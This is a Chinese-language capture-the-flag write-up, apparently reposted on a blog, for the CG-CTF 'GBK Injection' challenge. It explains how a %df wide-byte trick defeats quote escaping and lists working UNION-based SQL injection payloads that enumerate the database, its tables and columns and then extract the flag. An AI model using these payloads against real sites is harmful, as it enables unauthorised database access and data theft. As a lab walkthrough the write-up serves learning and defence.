GBK Injection

1.題目

2.首先我們進入題目地址，發現下圖所示，首先猜測可能存在sql注入

3.于是我們嘗試',但被轉義了

4.被轉義了，那咋辦，此時，想到了URL中%df與\結合會變成運，如下圖

5.因此我們可以閉合id的值，使用#，--空格或--+來注釋最后一個’

• 這里對#進行了過濾，但我們可以使用%23進行繞過
• –空格也是標準的SQl注釋語句，但這里對空格進行了過濾，但我們可以使用%20繞過
• –+不是標準的SQL注釋語句，但是+在查詢語句中變成了空格，從而最后整體也變成了注釋符–空格

–+變–空格，實例圖：

6.那我們接下來依次進行查詢爆破

• 判斷sql查詢語句字段數量，可知sql查詢語句有兩個字段
  %df' order by 2 %23
• 判斷哪些字段可利用，可知sql查詢語句第2字段可用
  %df' and 1=2 union select 1,2 %23
• 判斷當前數據庫，這只當前數據庫為sae-chinalover
  %df' and 1=2 union select 1,database() %23
• 判斷sae-chinalover數據庫下所有的表名，分別為：ctf,ctf2,ctf3,ctf4,gbksqli,news
  %df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652D6368696E616C6F766572 %23
• 判斷ctf4表中的字段(這里是依次判斷才發現ctf4里有flag)，為：id,flag
  %df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634 %23
• 判斷id與flag字段的值，結果為：1 flag{this_is_sqli_flag}
  %df' and 1=2 union select 1,group_concat(id,char(32),flag) from ctf4 %23

注：可能flag輸入后還是錯誤，我認為可能后臺管理出了一點問題，修改了flag值卻沒有更新
大家如果想了解sql(非盲注)，請點擊傳送門

總結

以上是生活随笔為你收集整理的CG-CTF-Web-GBK Injection的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。